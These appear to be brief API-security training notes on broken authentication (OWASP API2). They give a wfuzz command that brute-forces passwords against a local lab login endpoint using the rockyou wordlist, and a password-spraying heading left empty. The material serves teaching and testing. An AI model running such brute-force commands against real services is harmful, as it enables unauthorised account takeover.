Broken Authentication
API2-Broken Authentication
Authentication Bypass: Password Brute-Force Attacks and Password Spraying
Password Brute-Force Attacks:
wfuzz --help
wfuzz -d '{"email":"a@email.com","password":"FUZZ"}' -H 'Content-Type: application/json' -z file,/usr/share/wordlists/rockyou.txt -u http://127.0.0.1:8888/identity/api/auth/login --hc 405
Password Spraying:
Last updated